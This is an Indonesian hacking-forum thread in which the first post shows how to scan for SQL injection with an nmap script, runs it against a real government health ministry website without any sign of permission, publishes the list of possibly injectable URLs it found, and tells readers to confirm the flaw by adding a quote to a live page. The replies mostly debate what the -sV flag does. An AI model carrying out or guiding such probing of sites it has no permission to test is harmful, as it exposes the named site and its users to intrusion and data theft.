Scan vuln sql injection with NMAP

by teh 10-03-2016 - 07:47:57
#1
saya mau sharing tentang mencari celah sql injection dengan script yang ada di NMAP. maaf bila ada kesalahan mohon di koreksi mastah Blush 
command line yang saya gunakan 
Code:
nmap -sV --script=http-sql-injection www.target.com -Pn -p 80

keterangan :
-sV : untuk mendeteksi versi pada sistem operasi
--script : untuk memanggil script nmap yang akan di gunakan (untuk mencari script nmap yang lain nya ketik locate *.nse)
-Pn : untuk melewati proses identifikasi host yang sedang hidup (no ping)
-p : port yang digunakan

disini saya akan test situs http://www.depkes.go.id

Code:
tehmanis@0dayWL:~$ nmap -sV --script=http-sql-injection www.depkes.go.id -Pn -p 80

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-10 03:01 EST
Nmap scan report for www.depkes.go.id (202.70.136.4)
Host is up (0.026s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((Oracle))
|_http-server-header: Apache/2.2.15 (Oracle)
| http-sql-injection:
|   Possible sqli for queries:
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
|     http://www.depkes.go.id/pdf.php?id=a01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/pdf.php?id=16030500001%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|_    http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.95 seconds

nah ternyata pada situs tersebut terdapat vulneralbility sql injection, untuk memastikan nya kita buka browser lalu copas salah satu link vuneralbility nya
contoh :

Code:
http://www.depkes.go.id/index.php?lg=LN01

tambahkan kutip pada akhir alamat url, dan ini hasil nya.

[Image: 10qb7e1.jpg]


ini saya buat video nya juga cekidoot
semoga bermanfaat dan mohon maaf bilang banyak salah dalam thread ini Blush

#2
wahh coba dalam bentuk tulisan bang Big Grin
trus ada penjelasan di setiap paramter yang digunakan :v
root@localhost:~# cat something.txt
Dompu Linuxer
I'm Nothing Without Allah

#3
(10-03-2016, 08:56:45)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang Big Grin
trus ada penjelasan di setiap paramter yang digunakan :v

mkasih saran nya om. .maaf masih awam sama forumer :3

#4
Mantab,mas..
Ijin coba dulu dah..

#5
(10-03-2016, 15:37:54)teh Wrote:
(10-03-2016, 08:56:45)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang Big Grin
trus ada penjelasan di setiap paramter yang digunakan :v

mkasih saran nya om. .maaf masih awam sama forumer :3
maaf nii ada sedikit koreksi

biar lebih tepat penjelasan paramter -sV menurut yang yang juga msh belajar itu
-sv = service version scanning jadi kalau versi pada system operasi agak kurang tepat Big Grin

tapi mgkin ane yang salah :3
root@localhost:~# cat something.txt
Dompu Linuxer
I'm Nothing Without Allah

#6
Lumayan ilmu nya om..

#7
(10-03-2016, 19:04:37)Aiden_ Wrote:
(10-03-2016, 15:37:54)teh Wrote:
(10-03-2016, 08:56:45)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang Big Grin
trus ada penjelasan di setiap paramter yang digunakan :v

mkasih saran nya om. .maaf masih awam sama forumer :3
maaf nii ada sedikit koreksi

biar lebih tepat penjelasan paramter -sV menurut yang yang juga msh belajar itu
-sv = service version scanning jadi kalau versi pada system operasi agak kurang tepat Big Grin

tapi mgkin ane yang salah :3
wah mkasih lg om Big Grin  klo dari nmap --help fungsi -sV scanning fungsi ke database nya yaa kaya contoh di atas muncul versi DB oracle

#8
(10-03-2016, 22:42:47)teh Wrote:
(10-03-2016, 19:04:37)Aiden_ Wrote:
(10-03-2016, 15:37:54)teh Wrote:
(10-03-2016, 08:56:45)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang Big Grin
trus ada penjelasan di setiap paramter yang digunakan :v

mkasih saran nya om. .maaf masih awam sama forumer :3
maaf nii ada sedikit koreksi

biar lebih tepat penjelasan paramter -sV menurut yang yang juga msh belajar itu
-sv = service version scanning jadi kalau versi pada system operasi agak kurang tepat Big Grin

tapi mgkin ane yang salah :3
wah mkasih lg om Big Grin  klo dari nmap --help fungsi -sV scanning fungsi ke database nya yaa kaya contoh di atas muncul versi DB oracle
yaa emg bener, kan itu nama service nya apache, jadi itu di discloure versi dari service apache nya
coba kalau ente punya server, ente disable semua service yang berjalan pada port2 yang ingin di scan
kira versi nya akan keluar apa kagak Big Grin
root@localhost:~# cat something.txt
Dompu Linuxer
I'm Nothing Without Allah

#9
hmm gitu yaa proses nya mkasih kang aiden nambah ilmu lg nih saya Big Grin

#10
wiiihh mantap
Zero-Security.id | BackBox Jakarta Team






Users browsing this thread: 1 Guest(s)

Color Skins

Change Color:

Background Patterns:

Background Images:

Background Header:

Setting Panel

Main Options: